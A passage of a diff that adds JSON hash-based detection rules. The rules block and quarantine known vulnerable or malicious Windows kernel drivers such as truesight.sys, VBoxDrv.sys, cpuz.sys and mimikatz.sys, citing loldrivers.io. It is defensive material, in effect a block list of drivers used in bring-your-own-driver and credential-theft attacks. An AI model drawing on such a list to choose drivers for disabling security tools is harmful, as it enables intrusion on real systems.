+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1f90d9c4d259c1fde4c7bb66a95d71ea0122e4dfb75883a6cb17b5c80ce6d18a",
+ "comment": "Vulnerable Kernel Driver (aka d3.sys) [https://www.loldrivers.io/drivers/13b2424a-d337-4bc7-ad1d-2049c79906b4/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7233b28c-2592-527a-b88e-a25c7e92e4da",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.831713Z",
+ "creation_date": "2026-03-23T11:45:30.831715Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.831720Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7cd32d0dcff4f90f0748d657ce5ac439605d30fadde084715479c3c3301552a0",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7234d27d-d3f6-500c-954b-06eeee243033",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.832022Z",
+ "creation_date": "2026-03-23T11:45:30.832024Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.832030Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5a195eb7e92b9aadaf6a3d56267d60acd9dd7f1bab14c3359d2c7ac84ff26afb",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7237a396-cff4-55c2-85e8-da29c1d2165c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.608848Z",
+ "creation_date": "2026-03-23T11:45:29.608850Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.608855Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c62bf9d0cc1edfffc15f3f002cd7f51efe3372320ec89d9dc96011000915c186",
+ "comment": "VirtualBox VBoxDrv vulnerable driver (aka VBoxDrv.sys) [CVE-2008-3431] [https://www.loldrivers.io/drivers/79542852-3a0c-43bc-bfa3-3eeb0e1d7fd2/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "723ea7f7-c4c3-59ea-9bfc-fe24a5456507",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.819135Z",
+ "creation_date": "2026-03-23T11:45:31.819138Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.819143Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "519b16721301d8d48f85be37a8710735d686ed128aaacaf0ca0599dfd4d4466c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7240064e-aada-52f4-b1f8-23446c613cad",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.617132Z",
+ "creation_date": "2026-03-23T11:45:29.617134Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.617139Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7e8e7bc080b4c32ce703b3e8b3cc7e13fa9ef2422dc6f370a2c2b82496564aae",
+ "comment": "American Megatrends vulnerable BIOS flash tool (aka UCOREW64.SYS and amifldrv64.sys) [https://www.loldrivers.io/drivers/a338a9fc-9fe3-400c-9fe4-69bb7892602d/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "724b8135-c813-5c7a-9ee8-444dadbbe9a3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.489452Z",
+ "creation_date": "2026-03-23T11:45:31.489455Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.489463Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8e24bdf488308df21bcff4c381d235b536e34545bfe4e005bdff58b67622b7de",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "724d73f9-d673-5b10-a84d-d3afcc9416d9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.491271Z",
+ "creation_date": "2026-03-23T11:45:31.491274Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.491282Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "afc3e6f78dec5a0763e5b24bbcadc00f11d602c92460536d00cbb5cef8fc441f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "724ee48e-a0c8-56dd-b4ff-8dca7aca1e28",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.457012Z",
+ "creation_date": "2026-03-23T11:45:30.457015Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.457024Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a298cc166fe3bac9e9e4cae967f8e3bb41b08a6a97117ca4f8e5c4f198dbcffa",
+ "comment": "Vulnerable Kernel Driver (aka iobitunlocker.sys) [https://www.loldrivers.io/drivers/e368efc7-cf69-47ae-8204-f69dac000b22/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "724f12ac-88fc-5a7e-b859-ad34b5d8cabe",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.153858Z",
+ "creation_date": "2026-03-23T11:45:31.153860Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.153865Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e502b63c5fac48bca6fc42c02aecf126310ddb318950222fe37402c0ec3ae15c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "725edd8d-7a53-5d46-b574-cb7ddfdbf9c1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.148555Z",
+ "creation_date": "2026-03-23T11:45:31.148557Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.148562Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a7a61e11e82a08261b9816fefbeadc3b3253596a2a5e13d3cf6b521431245d3a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "726678cf-a8df-5f40-affe-ea4fc8030dea",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.477891Z",
+ "creation_date": "2026-03-23T11:45:30.477895Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.477904Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "32d6b047b0489421f7983da7d5d11f8deb2a56935d5ae0ae23cca1c0903ecad5",
+ "comment": "Vulnerable Kernel Driver (aka elbycdio.sys) [https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "72741d26-8907-5c09-8834-91f03916f3ec",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.469776Z",
+ "creation_date": "2026-03-23T11:45:30.469780Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.469789Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3d73996901d2bfac9999a55723cb57ef5bde1e9a73070979df69f1f1fa8782c1",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "727463a2-1edc-504a-8bb8-e3d8be8f7c7a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.462519Z",
+ "creation_date": "2026-03-23T11:45:30.462522Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.462531Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "be25688313f29d7e62c996572825c33f3dcdda373ec235efe552aeb2219990bb",
+ "comment": "Malicious Kernel Driver (aka mimikatz.sys) [https://www.loldrivers.io/drivers/14556074-b235-4378-b356-f58721629d72/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7276a919-f948-5c59-aa57-d17d1f6bf5fe",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.473154Z",
+ "creation_date": "2026-03-23T11:45:30.473158Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.473167Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "11a4b08e70ebc25a1d4c35ed0f8ef576c1424c52b580115b26149bd224ffc768",
+ "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "727a8477-2588-592b-91a5-cbe1586b1704",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.610706Z",
+ "creation_date": "2026-03-23T11:45:29.610708Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.610714Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a072197177aad26c31960694e38e2cae85afbab070929e67e331b99d3a418cf4",
+ "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "727c2643-8669-5189-85b0-29713dec87da",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.828185Z",
+ "creation_date": "2026-03-23T11:45:31.828187Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.828192Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "42b1ed800666677389698c484d15b6ca791393636b27a5111c1e34b5de11b462",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "727c34d7-8c9f-5410-b3bc-ab2f53639a11",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.815880Z",
+ "creation_date": "2026-03-23T11:45:31.815882Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.815888Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b1e4afb828ebe4b942a8e6a25aee656978505014c66e75f8a337c564392ef666",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "728bfa36-9839-5e1d-b6fb-6623911c4548",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.458137Z",
+ "creation_date": "2026-03-23T11:45:30.458140Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.458149Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5a661e26cfe5d8dedf8c9644129039cfa40aebb448895187b96a8b7441d52aaa",
+ "comment": "Vulnerable Kernel Driver (aka nscm.sys) [https://www.loldrivers.io/drivers/351ff5ca-f07b-4eb6-9300-d5d31514defb/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "729271a8-b91e-52aa-bf62-29b9d8258387",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.498632Z",
+ "creation_date": "2026-03-23T11:45:31.498635Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.498643Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "412144f010eb05a990869c6ff36e7ddc1da7655a627dd61b3b524c19e46c7f12",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "729ba945-2635-5f7c-85ac-361586b252a6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.982032Z",
+ "creation_date": "2026-03-23T11:45:29.982034Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.982040Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c2d209ed240027608003f8d32b621f8baaf5601aaf348e64269e4457a594c7c3",
+ "comment": "Vulnerable Kernel Driver (aka PCHunter.sys) [https://www.loldrivers.io/drivers/a261cd64-0d04-4bf5-ad73-f3bb96bf83cf/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "72a35022-1f84-560d-b2c3-fb64df534ae6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.984338Z",
+ "creation_date": "2026-03-23T11:45:29.984340Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.984345Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f581decc2888ef27ee1ea85ea23bbb5fb2fe6a554266ff5a1476acd1d29d53af",
+ "comment": "Vulnerable Kernel Driver (aka inpoutx64.sys) [https://www.loldrivers.io/drivers/91ff1575-9ff2-46fd-8bfe-0bb3e3457b7f/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "72aac524-22a4-5d1f-90ec-ab810689f95d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.453695Z",
+ "creation_date": "2026-03-23T11:45:30.453699Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.453707Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f2cf5653792f32013c6bf8afb2217953708c7040e248ee7a48543e78097c4512",
+ "comment": "Vulnerable Kernel Driver (aka nicm.sys) [https://www.loldrivers.io/drivers/86cff0de-2536-4b8d-a846-a7312c569597/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
